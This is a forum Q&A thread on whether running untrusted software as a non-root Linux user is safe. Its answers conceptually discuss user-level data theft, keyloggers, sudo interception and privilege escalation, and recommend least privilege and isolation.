We always hear it is safe to run unknown programs as non-root users in Linux because non-root users are sandboxed from the system level and can't change anything out of their permission scope. If need be, as root user one can always delete a non-root user and be confident the rest of the system wasn't affected.
However, isn't it possible for a low-level user to install a script with a keylogger, for example, that waits for an su - or sudo call and takes system control from there?
We always hear...
Do we? I don't.
Installing some untrusted program as a normal user is a bad idea with Linux the same it is with Windows or Mac: this program has access to all your data and can delete these data, send these data to somebody else etc. Moreover it can make screenshots, control other applications running on the same X windows screen (even if they run as a different user), can grab keys (i.e. keylogger),... For details see The Linux Security Circus: On GUI isolation.
Apart from that we regularly have privilege escalation bugs even in Linux bugs which can be used by an unprivileged user to get root or even kernel level permissions.
Thus don't install any untrusted programs on any kind of system unless you are willing to compromise this system or the data stored on it.
In short: yes, being on a low-privilege account helps protect you against malware, but does not make you immune. Like any security measure, no single thing is going to keep you 100% safe.
TL;DR: Running on a low-privilege account (aka "principle of least privilege") should be part of a balanced breakfast which also includes good firewall configurations; tools to monitor processes, system resources, open ports, network traffic, etc for suspicious activity; a policy to only run signed executables, configuration of the SELinux secure kernel mod, keeping the OS and application up to date with security patches, and other things.
Your question is very broad to answer directly. Instead I'll break it into several cases based on the configuration of the system, and what the attacker is after:
Let's say the linux computer in question is my personal laptop. I effectively use this as a single-user system and I type sudo pretty regularly - so all of the things you mentioned apply. Moreover, if the attacker is trying to steal my personal information like credit card numbers, tax documents, etc, that's all sitting in my home directory where this user has access to it. If it's ransomware and wants to encrypt my personal files - same thing. They want to install a background process to make my computer part of a botnet, that doesn't need any special permissions.
The damage of getting malware onto an admin's account is less than the end-user case above since the admin account probably has no valuable data in it. but even so, an attacker can probably do some damage by having a packet sniffer inside the network, or by opening a port that allows the attacker to do pen testing from inside the network. Here you would rely on your firewall configuration to protect you against some of this and hopefully notify you to the suspicious activity so you can clean it up.
If the admin types sudo on a regular basis, then yeah, you're probably in trouble.
Imagine the use in question is tomcat - a very low-privilege user that runs the web server applications. This is the case people usually think of when talking about "principle of least privilege", and getting malware onto this account will be the least dangerous of the three case I've mentioned.
Also consider that Privilege Escalation exploits exist for linux that would allow a low-privilege user to bypass the OS security and turn themself into root. Generally speaking, keeping up to date with security patches protects you against this, but actors wealthy enough to purchase exploits on the black market will know about zero-day exploits that are not publicly known, and have not been patched.
This is a horrible case of Security Theater
Security Theater is the practice or belief of something that looks like it improves security, but in reality does little/harm to it.
This false belief has been around as long as the following rumor
Linux has no viruses because of it's permission system
That's almost as good as saying
I don't have a virus on my computer because I don't see anything flashing
Just because you don't see it, doesn't mean it's true. Closing your eyes doesn't protect you from the intruder.
In all reality Linux, Mac OS, Windows, Android, Xbox, everything has vulnerabilities that would allow escalation to a system level of control.
HOWEVER just because the attack doesn't escalate itself to system level doesn't mean it isn't EXTREMELY dangerous. These applications with just user level access can still steal your information, record your every move, and hold your data for ransom! All without EVER being escalated because this is the data it has access to as just your user.
These facts are true of ANY OS regardless of the device. If you have access to the memory, it has access to the memory. That means even if you can't see it, it still has access to it.
Because you are a regular user it means the attack isn't already at root level privileges, which means the access it has it limited to the users access, and helps protect other users on the system. Of course this doesn't mean that escalation can't happen, it just means it's much harder.
The system itself is safe from accounts that aren't root-equivalent, but that doesn't help much on a desktop where most of what you care about is your own data, and you authenticate regularly to become root from your account.
If someone has an account on a correctly-configured multi-user system, and they don't have sudo privileges or the root password, then barring any bugs in privileged software, there's nothing that user can do that will give them control of the machine. A user account that may have installed malicious software should be considered a potential attacker by the rest of the system.
On my desktop, I added an unprivileged account that I can sudo to, but it can't sudo to root. I sometimes run software I trust a bit, but not entirely, under that account, esp. if it uses networking.
In theory, since I give that account access to my X server, it could escalate its privileges with clipboard / keystroke-simulation attacks. It's in the same Unix group as my regular account, and I'm sure I haven't fully removed group-write permission from some important files, but I did chmod 0644 ~/.bash{rc,_profile} and some other important files. So it's an extra hurdle that some malware might not have anticipated.
The recipe here, while not by any means foolproof, is incomplete or wrong.
Installing untrusted software under your unprivileged account is a disaster.
Installing it in a carefully prepared other unprivileged account? Less risky, but by no means guaranteed to be safe.
If:
then you are as secure as any environment that depends on multi-user security on a shared Linux system. However, those bullets represent quite a lot of work. Wouldn't it be easier to boot a CD or a VM?
isn't it possible for a low-level user to install a script with a keylogger, for example, that waits for an su - or sudo call and takes system control from there?
No - and you've already given the answer, because that is "out of their permission scope". Linux has always been a multi-user system and (nearly) everything which can be implemented outside of the kernel is implemented outside of the kernel and therefore subject to the constraints of the permissions system.
A user can install/run code which trashes their own data, but the only way any further harm can be done is by exploiting a vulnerability in the implementation.
Yes, if that user has 'su' or sudo access then its possible that malware could change the path to point to its own code instead of su/sudo and thereby MITM the interaction. but this is a bit more tricky to do in practice, since su or sudo would have to be invoked from process tree which already contains the running malware.
